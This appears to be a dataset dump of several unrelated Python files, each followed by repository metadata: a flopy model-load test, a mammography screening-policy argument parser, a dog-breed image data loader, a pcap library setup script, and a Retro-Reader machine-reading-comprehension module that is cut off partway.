print(" ChAnswer(1):", PacketFactory.createChAnswer(True))
print(" ChAnswer(0):", PacketFactory.createChAnswer(False))
print("CfgAnswer(1):", PacketFactory.createCfgAnswer(True))
print("CfgAnswer(0):", PacketFactory.createCfgAnswer(False))
| 26.210526 | 197 | 0.683333 | 642 | 4,980 | 5.238318 | 0.182243 | 0.045495 | 0.024978 | 0.023194 | 0.32025 | 0.275052 | 0.247696 | 0.22926 | 0.207255 | 0.207255 | 0 | 0.030848 | 0.173293 | 4,980 | 189 | 198 | 26.349206 | 0.786009 | 0.032932 | 0 | 0.294118 | 0 | 0 | 0.081824 | 0.01395 | 0 | 0 | 0.006038 | 0.005291 | 0 | 1 | 0.196078 | false | 0.019608 | 0.013072 | 0.058824 | 0.366013 | 0.052288 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62298e624275292f5e8c6bb45a61f981abe08392 | 2,277 | py | Python | autotest/t037_test.py | hansonmcoombs/flopy | 49398983c36d381992621d5bf698ea7f78fc0014 | [
"CC0-1.0",
"BSD-3-Clause"
] | null | null | null | autotest/t037_test.py | hansonmcoombs/flopy | 49398983c36d381992621d5bf698ea7f78fc0014 | [
"CC0-1.0",
"BSD-3-Clause"
] | null | null | null | autotest/t037_test.py | hansonmcoombs/flopy | 49398983c36d381992621d5bf698ea7f78fc0014 | [
"CC0-1.0",
"BSD-3-Clause"
] | null | null | null | """
Some basic tests for SWR2 load.
"""
import os
import pymake
import pytest
from ci_framework import FlopyTestSetup, base_test_dir
import flopy
base_dir = base_test_dir(__file__, rel_path="temp", verbose=True)
swi_path = os.path.join("..", "examples", "data", "mf2005_test")
cpth = os.path.join("temp", "t037")
mf_items = ["swiex1.nam", "swiex2_strat.nam", "swiex3.nam"]
exe_name = "mf2005"
v = flopy.which(exe_name)
run = True
if v is None:
run = False
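# only run the models when the mf2005 executable is available on the path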
def load_swi(mfnam):
name = mfnam.replace(".nam", "")
model_ws = f"{base_dir}_{name}"
test_setup = FlopyTestSetup(verbose=True, test_dirs=model_ws)
pymake.setup(os.path.join(swi_path, mfnam), model_ws)
m = flopy.modflow.Modflow.load(
mfnam, model_ws=model_ws, verbose=True, exe_name=exe_name
)
assert m.load_fail is False
if run:
try:
success, buff = m.run_model(silent=False)
except:
success = False
assert success, "base model run did not terminate successfully"
fn0 = os.path.join(model_ws, mfnam)
# write free format files -
# won't run without resetting to free format - evt external file issue
m.free_format_input = True
# rewrite files
model_ws2 = os.path.join(model_ws, "flopy")
m.change_model_ws(
model_ws2, reset_external=True
) # l1b2k_bath wont run without this
m.write_input()
if run:
try:
success, buff = m.run_model(silent=False)
except:
success = False
assert success, "base model run did not terminate successfully"
fn1 = os.path.join(model_ws2, mfnam)
if run:
fsum = os.path.join(
model_ws, f"{os.path.splitext(mfnam)[0]}.budget.out"
)
try:
success = pymake.compare_budget(
fn0, fn1, max_incpd=0.1, max_cumpd=0.1, outfile=fsum
)
except:
success = False
print("could not perform budget comparison")
assert success, "budget comparison failure"
return
@pytest.mark.parametrize(
"namfile",
mf_items,
)
def test_mf2005swi2load(namfile):
load_swi(namfile)
return
if __name__ == "__main__":
for namfile in mf_items:
load_swi(namfile)
| 23.71875 | 74 | 0.629776 | 308 | 2,277 | 4.454545 | 0.37013 | 0.045918 | 0.05102 | 0.043732 | 0.196064 | 0.158892 | 0.158892 | 0.158892 | 0.158892 | 0.158892 | 0 | 0.020262 | 0.263065 | 2,277 | 95 | 75 | 23.968421 | 0.797378 | 0.076416 | 0 | 0.30303 | 0 | 0 | 0.147706 | 0.018642 | 0 | 0 | 0 | 0 | 0.060606 | 1 | 0.030303 | false | 0 | 0.075758 | 0 | 0.136364 | 0.015152 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
622afff6f65764669a8a396c649e02dffa29baaa | 14,868 | py | Python | oncopolicy/utils/parsing.py | yala/Tempo | bf3e0e78d64869bb2079c582a4a35982f78386ad | [
"MIT"
] | 6 | 2022-01-15T11:57:19.000Z | 2022-02-13T21:15:22.000Z | oncopolicy/utils/parsing.py | yala/Tempo | bf3e0e78d64869bb2079c582a4a35982f78386ad | [
"MIT"
] | null | null | null | oncopolicy/utils/parsing.py | yala/Tempo | bf3e0e78d64869bb2079c582a4a35982f78386ad | [
"MIT"
] | 2 | 2022-02-02T13:09:29.000Z | 2022-02-18T07:06:19.000Z | import pickle
import numpy as np
import argparse
import torch
import os
import pwd
from oncopolicy.datasets.factory import get_dataset_class
from oncopolicy.utils.generic import AverageMeter
from oncopolicy.metrics.factory import get_metric_keys
BATCH_SIZE_SPLIT_ERR = 'batch_size (={}) should be a multiple of batch_splits (={})'
POSS_VAL_NOT_LIST = 'Flag {} has an invalid list of values: {}. Length of list must be >=1'
RACE_CODE_TO_NAME = { 1: 'White',
2: 'African American',
3: 'Other',
4: 'Asian or Pacific Islander',
5: 'Other',
6: 'Other',
7: 'Other',
8: 'Other',
9: 'Asian or Pacific Islander',
10: 'Asian or Pacific Islander',
11: 'Asian or Pacific Islander',
12: 'Asian or Pacific Islander',
13: 'Asian or Pacific Islander'
}
def parse_dispatcher_config(config):
'''
Parses an experiment config, and creates jobs. For flags that are expected to be a single item,
but the config contains a list, this will return one job for each item in the list.
:config - experiment_config
returns: jobs - a list of flag strings, each of which encapsulates one job.
*Example: --train --cuda --dropout=0.1 ...
    returns: experiment_axies - axes that the grid search is searching over
'''
jobs = [""]
experiment_axies = []
search_spaces = config['search_space']
    # Support a list of search spaces, convert to a length-one list for backward compatibility
if not isinstance(search_spaces, list):
search_spaces = [search_spaces]
for search_space in search_spaces:
# Go through the tree of possible jobs and enumerate into a list of jobs
for ind, flag in enumerate(search_space):
possible_values = search_space[flag]
if len(possible_values) > 1:
experiment_axies.append(flag)
children = []
if len(possible_values) == 0 or type(possible_values) is not list:
raise Exception(POSS_VAL_NOT_LIST.format(flag, possible_values))
for value in possible_values:
for parent_job in jobs:
if type(value) is bool:
if value:
new_job_str = "{} --{}".format(parent_job, flag)
else:
new_job_str = parent_job
elif type(value) is list:
val_list_str = " ".join([str(v) for v in value])
new_job_str = "{} --{} {}".format(parent_job, flag,
val_list_str)
else:
new_job_str = "{} --{} {}".format(parent_job, flag, value)
children.append(new_job_str)
jobs = children
return jobs, experiment_axies
def parse_args():
parser = argparse.ArgumentParser(description='OncoPolicy Classifier')
# setup
parser.add_argument('--run_prefix', default="snapshot", help="what to name this type of model run")
parser.add_argument('--train', action='store_true', default=False, help='Whether or not to train model')
parser.add_argument('--test', action='store_true', default=False, help='Whether or not to run model on test set')
parser.add_argument('--do_subgroup_eval', action='store_true', default=False, help="Rerun test on diff subgroups")
parser.add_argument('--dev', action='store_true', default=False, help='Whether or not to run model on dev set')
parser.add_argument('--seed', type=int, default=0, help='Random seed')
# data
parser.add_argument('--task', type=str, default='screening', help="Type of task. fit a screening policy or learn a risk progression model")
parser.add_argument('--risk_dimension', type=int, default=5, help='Max followup risk is defined over. 5 for 5 years')
parser.add_argument('--recallibrate', action='store_true', default=False, help="Recallibrate mirai probs per test set.")
parser.add_argument('--max_screening_interval_in_6mo_counts', type=int, default=6, help='Max half-years before next screening. 6 for 3 years, 4 for 2 years, etc.')
parser.add_argument('--min_screening_interval_in_6mo_counts', type=int, default=1, help='Min half-years before next screening. 1 for 6 months, etc.')
parser.add_argument('--dataset', default='mnist', help='Name of dataset from dataset factory to use [default: mnist]')
parser.add_argument('--use_all_trajec_for_eval', action='store_true', default=False, help='Whether or not to use all starting points in dev set')
parser.add_argument('--num_workers', type=int, default=8, help='num workers for each data loader [default: 8]')
parser.add_argument('--metadata_pickle_path', type=str, default='raw_data/ki_trajectories/mirai_trajectories.p.with_splits', help='path of metadata pickle file.')
    parser.add_argument('--metadata_csv_path', type=str, default='raw_data/cgmh_trajectories/cancer_dates.csv', help='path of auxiliary information of trajectories.')
parser.add_argument('--subgroup_metadata_path', type=str, default='/data/rsg/mammogram/pgmikhael/MGH_ACC_TO_X.pkl', help='path of metadata pickle file.')
parser.add_argument('--get_conf_intervals', action='store_true', default=False, help="Use conf intervals in reporting all metrics")
parser.add_argument('--use_callibrator', action='store_true', default=False, help="Use callibrator before using MSE metrics")
parser.add_argument('--callibrator_path', type=str, default='raw_data/MIRAI_FULL_PRED_RF.callibrator.p', help='where to load the callibrator')
# sampling
    parser.add_argument('--class_bal', action='store_true', default=False, help='Whether to apply a weighted sampler to balance between the classes on each batch.')
# regularization
parser.add_argument('--envelope_margin_loss_lambda', type=float, default=0.5, help='lambda to weigh the Envelope margin loss.')
parser.add_argument('--envelope_margin', type=float, default=0.5, help='Size of the envelope margin loss.')
parser.add_argument('--envelope_inference', action='store_true', default=False, help="Search envelope of preferences for inference")
parser.add_argument('--imitate_oracle', action='store_true', default=False, help="Switch model to do imitation learning only.")
parser.add_argument('--sample_all_oracle_transitions', action='store_true', default=False, help="Sample all transitions instead of oracle transitions only.")
parser.add_argument('--homotopy_decay_rate', type=float, default=0.99, help='How to scale homtopy lambda every reset.')
# learning
parser.add_argument('--optimizer', type=str, default="adam", help='optimizer to use [default: adam]')
parser.add_argument('--init_lr', type=float, default=0.001, help='initial learning rate [default: 0.001]')
parser.add_argument('--momentum', type=float, default=0, help='Momentum to use with SGD')
parser.add_argument('--lr_decay', type=float, default=0.5, help='initial learning rate [default: 0.5]')
    parser.add_argument('--weight_decay', type=float, default=0, help='L2 Regularization penalty [default: 0]')
    parser.add_argument('--patience', type=int, default=10, help='number of epochs without improvement on dev before halving learning rate and reloading best model [default: 10]')
parser.add_argument('--turn_off_model_reset', action='store_true', default=False, help="Don't reload the model to last best when reducing learning rate")
parser.add_argument('--sample_random_preferences', action='store_true', default=False, help="Sample preferences at random with unit mean and a truncated guassian")
parser.add_argument('--fixed_preference', nargs='*', default=[1.0, 3.0], help='List of preference weights')
parser.add_argument('--num_estimates_for_dev', type=int, default=10, help='Number of loops through dev set to estimate randomized reward')
parser.add_argument('--tuning_metric', type=str, default='loss', help='Metric to judge dev set results. Possible options include auc, loss, accuracy [default: loss]')
parser.add_argument('--epochs', type=int, default=256, help='number of epochs for train [default: 256]')
parser.add_argument('--max_batches_per_train_epoch', type=int, default=10000, help='max batches to per train epoch. [default: 10000]')
parser.add_argument('--max_batches_per_dev_epoch', type=int, default=10000, help='max batches to per dev epoch. [default: 10000]')
    parser.add_argument('--batch_size', type=int, default=32, help='batch size for training [default: 32]')
    parser.add_argument('--batch_splits', type=int, default=1, help='Splits batch size into smaller batches in order to fit gpu memory limits. Optimizer step is run only after one batch size is over. Note: batch_size/batch_splits should be int [default: 1]')
parser.add_argument('--dropout', type=float, default=0.25, help='Amount of dropout to apply on last hidden layer [default: 0.25]')
parser.add_argument('--replay_size', type=int, default=10000, help='Amount transitions to store in experience replay size')
parser.add_argument('--reward_decay_lambda', type=float, default=.99, help='How to weight rewards in one transition from here')
parser.add_argument('--epsilon', type=float, default=.1, help='How often to take random actions to explore')
parser.add_argument('--max_oracle_prob', type=float, default=0.50, help='Max how often to take oracle action to explore with oracle')
parser.add_argument('--min_oracle_prob', type=float, default=0.10, help='Min how often to take oracle action to explore with oracle')
parser.add_argument('--oracle_decay_rate', type=float, default=0.50, help='How much to decay oracle prob on every reset')
parser.add_argument('--reset_rate', type=int, default=500, help='How many steps before reset target model, decay epsilon etc.')
parser.add_argument('--save_dir', type=str, default='snapshot', help='where to dump the model')
parser.add_argument('--results_path', type=str, default='logs/snapshot', help='where to save the result logs')
parser.add_argument('--no_tuning_on_dev', action='store_true', default=False, help='Train without tuning on dev (no adaptive lr reduction or saving best model based on dev)')
parser.add_argument('--lr_reduction_interval', type=int, default=1, help='Number of epochs to wait before reducing lr when training without adaptive lr reduction.')
parser.add_argument('--data_fraction', type=float, default=1.0, help='Fraction of data to use, i.e 1.0 for all and 0 for none. Used for learning curve analysis.')
# model
parser.add_argument('--screening_model_name', type=str, default='annual_guideline', help="Form of screening policy model, i.e annual_guideline, some nn, etc.")
parser.add_argument('--screening_snapshot', type=str, default=None, help='filename of model snapshot to load[default: None]')
parser.add_argument('--progression_model_name', type=str, default='last_observed_risk', help="Form of progression model, i.e last_observed_risk, some nn, etc, etc.")
parser.add_argument('--progression_snapshot', type=str, default=None, help='filename of model snapshot to load[default: None]')
parser.add_argument('--hidden_dim', type=int, default=50, help='Hidden dim of linear layers in progression or screening model')
parser.add_argument('--num_layers', type=int, default=1, help='Number of layers used neural models.')
parser.add_argument('--teacher_forcing_for_progression', action='store_true', default=False, help='Use teacher forcing when training risk progression model')
parser.add_argument('--max_early_detection_benefit', type=int, default=18, help='Max number of months that yields an early detection benefit.')
parser.add_argument('--use_pessimistic_detection_definition', action='store_true', default=False, help='Consider only screens in max window to offer benefit')
# device
parser.add_argument('--cuda', action='store_true', default=False, help='enable the gpu')
parser.add_argument('--num_gpus', type=int, default=1, help='Num GPUs to use in data_parallel.')
parser.add_argument('--data_parallel', action='store_true', default=False, help='spread batch size across all available gpus. Set to false when using model parallelism. The combo of model and data parallelism may result in unexpected behavior')
args = parser.parse_args()
# Set args particular to dataset
get_dataset_class(args).set_args(args)
args.cuda = args.cuda and torch.cuda.is_available()
args.device = 'cuda' if args.cuda else 'cpu'
args.unix_username = pwd.getpwuid( os.getuid() )[0]
args.metrics = sorted(get_metric_keys(screen_only = True))
args.fixed_preference = [float(pref) for pref in args.fixed_preference ]
args.step_index = 1
assert len(args.fixed_preference) == len(args.metrics)
# learning initial state
args.optimizer_state = None
args.current_epoch = None
args.lr = None
args.epoch_stats = None
args.step_indx = 1
if args.use_callibrator:
args.callibrator = pickle.load(open(args.callibrator_path,'rb'))
# Check whether certain args or arg combinations are valid
validate_args(args)
np.random.seed(args.seed)
args.average_meter_dict = {'loss': AverageMeter()}
return args
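# predicates that pick evaluation subgroups (race, age, breast density) from the exam metadata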
def load_subgroups(args):
metadata = pickle.load(open(args.subgroup_metadata_path,'rb'))
subgroup_lambda = {'african american': lambda sample: 'African American' in metadata['acc_to_race'][sample['exam']],
'asian': lambda sample: 'Asian' in metadata['acc_to_race'][sample['exam']] ,
'white': lambda sample: 'White' in metadata['acc_to_race'][sample['exam']] ,
'<= 55': lambda sample: metadata['acc_to_age'][sample['exam']] <= 55,
'> 55': lambda sample: metadata['acc_to_age'][sample['exam']] > 55,
'Non-dense': lambda sample: metadata['acc_to_density'][sample['exam']] in [1,2],
'Dense': lambda sample: metadata['acc_to_density'][sample['exam']] in [3,4],
}
return subgroup_lambda
def validate_args(args):
"""Checks whether certain args or arg combinations are valid.
Raises:
Exception if an arg or arg combination is not valid.
"""
if args.batch_size % args.batch_splits != 0:
raise ValueError(BATCH_SIZE_SPLIT_ERR.format(args.batch_size, args.batch_splits))
assert args.task in ['screening', 'progression']
| 67.581818 | 259 | 0.690207 | 2,058 | 14,868 | 4.830904 | 0.219145 | 0.061557 | 0.116274 | 0.042044 | 0.283444 | 0.248139 | 0.167069 | 0.119091 | 0.086099 | 0.077047 | 0 | 0.013059 | 0.191418 | 14,868 | 219 | 260 | 67.890411 | 0.813924 | 0.057506 | 0 | 0.0125 | 0 | 0.01875 | 0.417551 | 0.055779 | 0 | 0 | 0 | 0 | 0.0125 | 1 | 0.025 | false | 0 | 0.05625 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
622bd455d2dc22cd186c34a9e25351b6ead8cf6a | 2,597 | py | Python | src/data/data_loader.py | Hannemit/dog_breed_classifier | 3e9cc6abe8a4dcb91eebcd4aaacaa04502fe9682 | [
"MIT"
] | null | null | null | src/data/data_loader.py | Hannemit/dog_breed_classifier | 3e9cc6abe8a4dcb91eebcd4aaacaa04502fe9682 | [
"MIT"
] | null | null | null | src/data/data_loader.py | Hannemit/dog_breed_classifier | 3e9cc6abe8a4dcb91eebcd4aaacaa04502fe9682 | [
"MIT"
] | null | null | null | from torchvision import datasets
import torch
from src.data import data_transformer
import numpy as np
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
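# let PIL load truncated/partially corrupted images instead of raising an error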
TRAIN_DATA_PATH = "data/raw/dogImages/train"
VALIDATION_DATA_PATH = "data/raw/dogImages/valid"
TEST_DATA_PATH = "data/raw/dogImages/test"
def get_loader(path_to_images, transformer, batch_size, num_workers, shuffle=True):
"""
get dataloaders for the specified images with given transformers, batch size, etc..
:param path_to_images: string, path to where the images are that we want in our loader
:param transformer: a transformer from torchvision.transforms. It tells us how each image is transformed as it is
loaded
:param batch_size: int, batch size
:param num_workers: int, number of workers
:param shuffle: boolean, if True then randomly shuffle the images
:return: torch data loader
"""
data = datasets.ImageFolder(path_to_images, transform=transformer)
loader = torch.utils.data.DataLoader(data, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)
return loader
def get_all_loaders(batch_size=15):
"""
get the train, validation and test loaders
:param batch_size: int, batch size to use
:return: dict, with keys "train", "valid" and "test".
"""
train_transformer = data_transformer.data_transform_from_scratch
test_valid_transformer = data_transformer.data_transform_bare
train_loader = get_loader(TRAIN_DATA_PATH, train_transformer, batch_size=batch_size, num_workers=0)
valid_loader = get_loader(VALIDATION_DATA_PATH, test_valid_transformer, batch_size=batch_size, num_workers=0)
test_loader = get_loader(TEST_DATA_PATH, test_valid_transformer, batch_size=batch_size, num_workers=0)
return {'train': train_loader, 'valid': valid_loader, 'test': test_loader}
def get_test_loader(batch_size=15, path=""):
if not path:
path = TEST_DATA_PATH
return get_loader(path, data_transformer.data_transform_bare, batch_size=batch_size, num_workers=0)
def get_training_classnames(data_path=""):
"""
Get the names of all the classes that are present in the training data
    :return: array of strings, each string is a class name (a breed of dog)
"""
if not data_path:
data_path = TRAIN_DATA_PATH
data = datasets.ImageFolder(data_path, transform=data_transformer.data_transform_from_scratch)
class_names = np.array([item[4:].replace("_", " ") for item in data.classes])
return class_names
| 41.887097 | 118 | 0.736619 | 367 | 2,597 | 4.956403 | 0.27248 | 0.08906 | 0.032985 | 0.052227 | 0.258933 | 0.172073 | 0.100605 | 0.084662 | 0.062672 | 0.062672 | 0 | 0.004253 | 0.185214 | 2,597 | 61 | 119 | 42.57377 | 0.855388 | 0.291105 | 0 | 0 | 0 | 0 | 0.051358 | 0.041913 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.166667 | 0 | 0.433333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
622cd9a7d59c2d58ec91e014b73a475b41d3c1b7 | 2,279 | py | Python | setup.py | kostya13/pypcappy | 7ffce21a5747c737bd2011ca1abfdda5bcb0b376 | [
"MIT"
] | 1 | 2017-08-20T11:24:26.000Z | 2017-08-20T11:24:26.000Z | setup.py | kostya13/pypcappy | 7ffce21a5747c737bd2011ca1abfdda5bcb0b376 | [
"MIT"
] | 1 | 2016-09-14T07:04:53.000Z | 2016-10-21T12:51:58.000Z | setup.py | kostya13/pypcappy | 7ffce21a5747c737bd2011ca1abfdda5bcb0b376 | [
"MIT"
] | 1 | 2018-10-29T10:18:57.000Z | 2018-10-29T10:18:57.000Z | #!/usr/bin/env python3
import sys
if sys.version_info < (3,):
print('ERROR: Only Python 3 is supported')
sys.exit(-1)
# To use a consistent encoding
from codecs import open
from os import path, system
import re
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', "Arguments to pass to py.test")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = []
def run_tests(self):
#import here, cause outside the eggs aren't loaded
import pytest
errno = pytest.main(self.pytest_args)
sys.exit(errno)
if sys.argv[-1] == 'publish':
    system('python setup.py sdist upload')
sys.exit()
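# read __version__ directly from the package source so the version is defined in one place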
with open('pypcappy/__init__.py', 'r') as fd:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('Cannot find version information')
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name = 'pypcappy',
version = version,
description = 'Pure Python3 PcapNg reader',
long_description = long_description,
long_description_content_type = 'text/markdown',
author = 'Guy Taylor',
author_email = 'thebigguy.co.uk@gmail.com',
url = 'https://github.com/TheBiggerGuy/pypcappy',
packages = find_packages(exclude=['docs', 'tests']),
package_data={'': ['LICENSE', 'README.md']},
zip_safe=False,
install_requires=[],
tests_require=['pytest'],
cmdclass = {'test': PyTest},
keywords = ['pcap'],
license = 'MIT',
classifiers = (
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
),
)
| 29.597403 | 74 | 0.647652 | 275 | 2,279 | 5.250909 | 0.530909 | 0.051939 | 0.069252 | 0.041551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006132 | 0.212813 | 2,279 | 76 | 75 | 29.986842 | 0.798774 | 0.081176 | 0 | 0.035088 | 0 | 0 | 0.31259 | 0.02202 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035088 | false | 0.017544 | 0.140351 | 0 | 0.210526 | 0.017544 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
623161e9645acd3a9a726c1af45abce8e60f271b | 17,061 | py | Python | uf/application/retro_reader.py | yupeijei1997/unif | 16685a89446e6ce14080439162a9bfd0c75f0521 | [
"Apache-2.0"
] | 1 | 2021-05-15T12:07:40.000Z | 2021-05-15T12:07:40.000Z | uf/application/retro_reader.py | yupeijei1997/unif | 16685a89446e6ce14080439162a9bfd0c75f0521 | [
"Apache-2.0"
] | null | null | null | uf/application/retro_reader.py | yupeijei1997/unif | 16685a89446e6ce14080439162a9bfd0c75f0521 | [
"Apache-2.0"
] | null | null | null | # coding:=utf-8
# Copyright 2020 Tencent. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' Applications based on Retro-Reader. '''
import numpy as np
from uf.tools import tf
from .base import MRCModule
from .bert import BERTVerifierMRC, get_bert_config
from .albert import get_albert_config
from uf.modeling.bert import BERTEncoder
from uf.modeling.albert import ALBERTEncoder
from uf.modeling.retro_reader import RetroReaderDecoder
from uf.tokenization.word_piece import get_word_piece_tokenizer
import uf.utils as utils
class RetroReaderMRC(BERTVerifierMRC, MRCModule):
''' Machine reading comprehension on Retro-Reader. '''
_INFER_ATTRIBUTES = BERTVerifierMRC._INFER_ATTRIBUTES
def __init__(self,
config_file,
vocab_file,
max_seq_length=256,
init_checkpoint=None,
output_dir=None,
gpu_ids=None,
do_lower_case=True,
reading_module='bert',
matching_mechanism='cross-attention',
beta_1=0.5,
beta_2=0.5,
threshold=1.0,
truncate_method='longer-FO'):
super(MRCModule, self).__init__(
init_checkpoint, output_dir, gpu_ids)
self.batch_size = 0
self.max_seq_length = max_seq_length
self.truncate_method = truncate_method
self.beta_1 = beta_1
self.beta_2 = beta_2
self._do_lower_case = do_lower_case
self._on_predict = False
self._reading_module = reading_module
self._matching_mechanism = matching_mechanism
self._threshold = threshold
self.__init_args__ = locals()
if reading_module == 'albert':
self.bert_config = get_albert_config(config_file)
else:
self.bert_config = get_bert_config(config_file)
        assert reading_module in ('bert', 'roberta', 'albert', 'electra'), (
            'Invalid value of `reading_module`: %s. Pick one from '
            '`bert`, `roberta`, `albert` and `electra`.' % reading_module)
        assert matching_mechanism in (
            'cross-attention', 'matching-attention'), (
            'Invalid value of `matching_mechanism`: %s. Pick one from '
            '`cross-attention` and `matching-attention`.' % matching_mechanism)
self.tokenizer = get_word_piece_tokenizer(vocab_file, do_lower_case)
self._key_to_depths = get_key_to_depths(
self.bert_config.num_hidden_layers)
if '[CLS]' not in self.tokenizer.vocab:
self.tokenizer.add('[CLS]')
self.bert_config.vocab_size += 1
tf.logging.info('Add necessary token `[CLS]` into vocabulary.')
if '[SEP]' not in self.tokenizer.vocab:
self.tokenizer.add('[SEP]')
self.bert_config.vocab_size += 1
tf.logging.info('Add necessary token `[SEP]` into vocabulary.')
def convert(self, X=None, y=None, sample_weight=None, X_tokenized=None,
is_training=False):
self._assert_legal(X, y, sample_weight, X_tokenized)
if is_training:
assert y is not None, '`y` can\'t be None.'
n_inputs = None
data = {}
# convert X
if X or X_tokenized:
tokenized = False if X else X_tokenized
X_target = X_tokenized if tokenized else X
(input_ids, input_mask, query_mask, segment_ids,
doc_ids, doc_text, doc_start) = self._convert_X(
X_target, tokenized=tokenized)
data['input_ids'] = np.array(input_ids, dtype=np.int32)
data['input_mask'] = np.array(input_mask, dtype=np.int32)
data['query_mask'] = np.array(query_mask, dtype=np.int32)
data['segment_ids'] = np.array(segment_ids, dtype=np.int32)
n_inputs = len(input_ids)
# backup for answer mapping
if self._on_predict:
self._tokenized = tokenized
self._X_target = X_target
if n_inputs < self.batch_size:
self.batch_size = max(n_inputs, len(self._gpu_ids))
# convert y
if y:
label_ids, has_answer = self._convert_y(
y, doc_ids, doc_text, doc_start, tokenized)
data['label_ids'] = np.array(label_ids, dtype=np.int32)
data['has_answer'] = np.array(has_answer, dtype=np.int32)
# convert sample_weight
if is_training or y:
sample_weight = self._convert_sample_weight(
sample_weight, n_inputs)
data['sample_weight'] = np.array(sample_weight, dtype=np.float32)
return data
def _convert_X(self, X_target, tokenized):
# tokenize input texts
segment_input_tokens = []
for ex_id, example in enumerate(X_target):
try:
segment_input_tokens.append(
self._convert_x(example, tokenized))
except Exception:
raise ValueError(
'Wrong input format (line %d): \'%s\'. '
'An untokenized example: '
'`X = [{\'doc\': \'...\', \'question\': \'...\', ...}, '
'...]`' % (ex_id, example))
# backup for answer mapping
if self._on_predict:
self._input_tokens = []
input_ids = []
input_mask = []
query_mask = []
segment_ids = []
doc_ids = []
doc_text = []
doc_start = []
for ex_id, segments in enumerate(segment_input_tokens):
_input_tokens = ['[CLS]']
_input_ids = []
_input_mask = [1]
_query_mask = [1]
_segment_ids = [0]
_doc_tokens = segments.pop('doc')
segments = list(segments.values()) + [_doc_tokens]
utils.truncate_segments(
segments, self.max_seq_length - len(segments) - 1,
truncate_method=self.truncate_method)
_doc_tokens = segments[-1]
for s_id, segment in enumerate(segments):
_segment_id = min(s_id, 1)
_input_tokens.extend(segment + ['[SEP]'])
_input_mask.extend([1] * (len(segment) + 1))
if s_id == 0:
_query_mask.extend([1] * (len(segment) + 1))
_segment_ids.extend([_segment_id] * (len(segment) + 1))
_doc_start = len(_input_tokens) - len(_doc_tokens) - 1
# backup for answer mapping
if self._on_predict:
self._input_tokens.append(_input_tokens)
_input_ids = self.tokenizer.convert_tokens_to_ids(_input_tokens)
_doc_ids = _input_ids[_doc_start: -1]
# padding
for _ in range(self.max_seq_length - len(_input_ids)):
_input_ids.append(0)
_input_mask.append(0)
_segment_ids.append(0)
for _ in range(self.max_seq_length - len(_query_mask)):
_query_mask.append(0)
input_ids.append(_input_ids)
input_mask.append(_input_mask)
query_mask.append(_query_mask)
segment_ids.append(_segment_ids)
doc_ids.append(_doc_ids)
doc_text.append(X_target[ex_id]['doc'])
doc_start.append(_doc_start)
return (input_ids, input_mask, query_mask, segment_ids,
doc_ids, doc_text, doc_start)
def _set_placeholders(self, target, on_export=False, **kwargs):
self.placeholders = {
'input_ids': utils.get_placeholder(
target, 'input_ids',
[None, self.max_seq_length], tf.int32),
'input_mask': utils.get_placeholder(
target, 'input_mask',
[None, self.max_seq_length], tf.int32),
'query_mask': utils.get_placeholder(
target, 'query_mask',
[None, self.max_seq_length], tf.int32),
'segment_ids': utils.get_placeholder(
target, 'segment_ids',
[None, self.max_seq_length], tf.int32),
'label_ids': utils.get_placeholder(
target, 'label_ids',
[None, 2], tf.int32),
'has_answer': utils.get_placeholder(
target, 'has_answer',
[None], tf.int32),
}
if not on_export:
self.placeholders['sample_weight'] = utils.get_placeholder(
target, 'sample_weight',
[None], tf.float32)
def _forward(self, is_training, split_placeholders, **kwargs):
def _get_encoder(model_name):
if model_name == 'bert' or model_name == 'roberta':
sketchy_encoder = BERTEncoder(
bert_config=self.bert_config,
